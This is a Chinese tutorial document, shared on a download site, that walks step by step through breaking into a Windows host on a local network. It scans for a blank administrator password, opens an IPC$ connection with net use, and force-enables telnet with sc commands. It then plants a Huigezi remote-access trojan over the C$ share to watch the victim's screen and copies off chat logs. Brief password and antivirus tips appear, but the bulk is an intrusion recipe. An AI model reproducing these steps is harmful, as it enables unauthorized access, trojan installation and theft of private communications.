简单黑客攻击步骤详解Word文件下载.docx
《简单黑客攻击步骤详解Word文件下载.docx》由会员分享,可在线阅读,更多相关《简单黑客攻击步骤详解Word文件下载.docx(13页珍藏版)》请在冰豆网上搜索。
图二启动Xscan后的样子
图三指定IP地址X围
设置完毕后点击“确定〞按钮,然后回到图二所示的界面,点击左上角的“
〞按钮,即可启动扫描。
扫描完毕后,Xscan会自动的把扫描结果生成一X网页格式的报表,翻到网页的最后部分,仔细观察图五中被黑色粗线条标示出的部分,我们发现这台计算机的超级管理员XX〔administrator〕居然没有设置任何密码。
至此,我们就成功的获取了IP地址为192.168.0.34的这台计算机的用户名和密码。
黑客攻击过程中最重要的一步已经轻松越过。
图四Xscan设置参数
图五超级XX的密码没有设置
小知识:
Xscan实际上是一个网络管理工具,能够帮助网管人员扫描网络,分析漏洞所在。
192.168.0.34如果设置一些简单密码如“111111〞、“123456〞,Xscan一样可以找出来,至于复杂一点的密码,只能通过流光软件暴力破解了,如果想让流光破解不了,你要确保你的密码足够复杂,至少八位以上。
2、创建超级连接:
当黑客们获取了用户密码之后,他们需要创建一条具有无限权限的超级通道。
此后的攻击活动将通过这条通道进行。
下面,我们来详细的讲解如何建立这条通道
点击计算机左下角的“开始〞按钮,在新弹出的菜单中点击“运行〞,在“打开〞后面的文字栏中输入“cmd〞然后点击“确定〞,我们就进入了命令行界面,整个过程如图六、图七所示。
图六运行界面
图七命令行界面
在这里为了操作方便,我们输入“cd\〞命令敲击键盘上的“Enter〞〔回车键〕回到根盘符。
输入命令“netuse\\\ipc$“〞/user:
administrator〞再回车,系统就会提示“命令成功完成〞。
至此,一条超级通道就被我们创建了,我们远程的获得了192.168.0.34这台主机的管理员权限。
过程如图八所示,为了让大家更清晰的看到效果,我对命令行界面的显示做了设置,这里不再详述。
图八创建超级通道的过程
命令中〞〞所在位置既是用户的密码,如果设置了密码比如“123456〞,只需要在〞〞对应的位置输入123456即可,记得要去掉〞〞。
如果我们通过其他渠道获取了某台计算机超级管理员的密码,在这里把IP地址〔也就是那一串192.168.0.34〕换成你所知道密码的那台计算机的IP地址,密码输入到〞〞对应的地方,一样可以创建超级通道。
3、开启telnet服务:
获取了管理员权限之后,黑客们更喜欢利用超级通道使用SC命令强行开启TELNET服务,从而能够远程登录至被黑掉的计算机,模拟本机操作,这样操作起来更轻松,性能也更强大,是黑客们地惯用手法。
下面我们就来讲解如何开启telnet服务。
还是在刚才的命令符提示下,我们输入命令“sc\\qctlntsvr〞,这条命令是查询目标主机的服务状态的,根据反馈回来的信息发现目标主机的telnet服务被禁用,禁用标识在图九的黑色下划线处。
图九服务状态显示“DISABLED〞,被禁用
此时我们输入“sc\\configtlntsvrstart=auto〞回车,系统会提示我们“[SC]ChangeServiceConfigSUCCESS〞,这代表着服务被允许使用了,然后我们再输入“sc\\192.168.0.34starttlntsvr〞,系统会提示我们服务处于启用状态,效果如图十所示。
注意黑色粗线条标示的地方。
图十两条命令的效果提示
至此,192.168.0.34就可以被telnet了,继续输入“telnet192.168.0.34〞之后回车,然后根据提示输入“y〞回车,我们就进入了登录界面,在“login〞提示处输入“administrator〞然后回车,系统会出现一行“password〞的提示,这是在要求你输入密码,由于192.168.0.34的超级管理员密码为空,我们直接回车〔图十一〕,就可以进入192.168.0.34的虚拟本机操作界面了,注意观察图十二左上角被黑色线条标示的地方,系统明确的告诉我们,现在正在远程操作192.168.0.34这台主机。
图十一telnet界面输入用户名和密码
telnet是一个功能非常强大的远程管理工具,设计它的本意是为了让网络管理员们免去跋山涉水之苦,可以坐在自己的办公室里很轻松的管理远方的服务器,但是由于网络的不安全性,这个服务在现在的操作系统里,默认情况下是被关闭的。
如果你想远程管理自己的计算机,可以在本机上按照上面的步骤输入类似的命令就可以开启了,注意设置一个足够复杂的密码,让别人没办法轻易地破解。
另外在我们输入密码的时候会发现计算机不会有任何提示,这是一个古老的安全法则,密码应该是不可见的,而且具体长度也不应显示出来,防止有心人通过密码长度猜出密码。
4、利用灰鸽子种下木马从而开启图形化控制界面:
命令行界面虽然速度很快,但是操作起来非常麻烦,几百条操作命令非常考验黑客们的记忆力,所以,黑客们想出了远程图形化控制的方法,我们在这里选用大名鼎鼎的黑客软件灰鸽子,让大家体会一下当黑客的强大。
首先我们需要获取灰鸽子软件,这种东东用XX一搜一大堆,选一个看上去可靠的下载下来吧。
我们启动灰鸽子,先来制作一个种子,选择“文件〞→“配置服务程序〞,在新菜单〔图十三〕中指定控制端的IP地址〔当然是我自己的计算机IP192.168.0.203了,图片上方黑色线条所示〕,指定保存地点和保存文件名〔图片下方黑色线条所示〕,点击“生成服务器〞即可完成。
图十三用灰鸽子生成种子
种子制作好了,接下来需要把种子拷贝至目标主机,先在192.168.0.34下输入“netshare〞,观察一下他的共享设置〔图十四〕。
哈!
这个菜鸟,简直不设防嘛!
重要的C盘都共享成C$了。
图十四在远程主机上观察共享情况
不要客气,再新建一个命令行界面〔回去看图六〕,输入“netusez:
\\192.168.0.34\c$〞,这句命令相当于是把192.168.0.34主机的C盘映射到本机的Z盘,然后执行命令“copyf:
\公开课\temp\setup.exez:
〞〔图十五〕。
图十五种子已经拷贝到目的主机了
然后在已经telnet到192.168.0.34的那个命令界面去观察一下,很明显已经拷贝成功了〔图十六黑色箭头所指〕,输入“setup〞回车,我们就已经把种子种上了。
图十六种子已经拷贝至目的主机了
当种下木马后,回来再用灰鸽子看一下,已经找到了〔图十七〕。
图十七受害者上线了
此时我们点击一下受害者主机,选择“捕获屏幕〞按钮,看看会有什么情况出现?
受害者的屏幕显示在我们面前,他正在干什么一清二楚啊!
操作如图十八所示。
图十八用灰鸽子观察受害者屏幕
通过这个例子我们知道,黑客们可以轻易的观察用户们正在干什么,一些私密信息将会很轻松的被黑客得到。
由于灰鸽子太有名了,所以现在很多的杀毒软件都对它做出了专门的防X,只要我们安装正版杀毒软件并且与时升级,就可以有效地防X灰鸽子的入侵。
另外灰鸽子本身有众多的改版,一些黑客高手利用黑客菜鸟们急于求成的心态,喜欢在灰鸽子软件上附加一些后门软件,那些黑客菜鸟们经常发现还没有黑了别人,自己已经成为了别人盘子里的菜。
做完这个课程,我一定要把我的系统重新安装一下,因为我不能确保我用的灰鸽子就是安全的。
可以利用“netsharec$/del〞命令删除共享盘符。
5、破解聊天记录:
现在的由于提供了密码保护,所以很难再被盗取,有些人习惯通过聊一些比较私密、比较敏感的话题,这种行为是不合适的,黑客们利用一些软件可以轻易地破解聊天记录,在里面寻找他们感兴趣的信息。
一般而言,腾讯公司的软件默认情况下安装在C:
\programfiles文件夹下,利用此前的net和copy命令,我们可以很轻松的把这些文件夹拷贝到本机,此时我们所需要做的就是找一款聊天记录查看器,执行它并且选定目录就可以了。
以下是具体操作。
首先,笔者手头有一款聊天记录查看器,启动后如图十九所示。
图十九聊天记录查看器
图二十点击查看后看到的聊天信息
通过这个软件我们可以轻易的盗取别人的聊天记录,如果在这些聊天记录里有敏感信息,那么失密是必然的。
图二十是点击了查看之后的界面,笔者在这里贡献了自己的聊天记录,做了一些隐密性处理。
现在的解密技术实在可怕,那些喜欢在公共场合使用的人们切记,聊完之后记得把自己的聊天记录销毁,这样能有效地保护自己的隐私不被他人侵犯。
6、Messenger通讯的趣味实验
计算机操作系统里有一个小小的通讯服务,如果我们开启了它,不用那些聊天软件也可以实现聊天功能,下面我们就做一下这个实验。
右键点击“我的电脑〞,在弹出的菜单中选择“管理〞,在弹出的“计算机管理〞中选择相应选项如图二十一。
注意两个黑色箭头的指向。
图二十一计算机管理界面内的服务界面
双击右方箭头所指向的“Messenger〞,在新弹出的界面中把启动类型从“已禁用〞改为“手动〞〔如图二十二〕后点击“应用〞按钮,此时“启动〞按钮会变成可点击状态,点击“启动〞按钮,我们的初期工作就做完了。
接下来另选一台计算机,启动命令行界面〔图六〕,输入命令“netsend192.168.0.203你好,菜鸟。
〞再回车,我的计算机上就出现了一个聊天窗口,如图二十三和二十四。
图二十二修改服务的启动类型
图二十三向主机192.168.0.203发送消息
图二十四主机192.168.0.203接收到的消息
这个服务自从开启了之后,聊天通讯是方便多了,但是有些不法分子利用这个服务发送大量的垃圾广告。
所以,我们还是把它关上的好。
升级会员 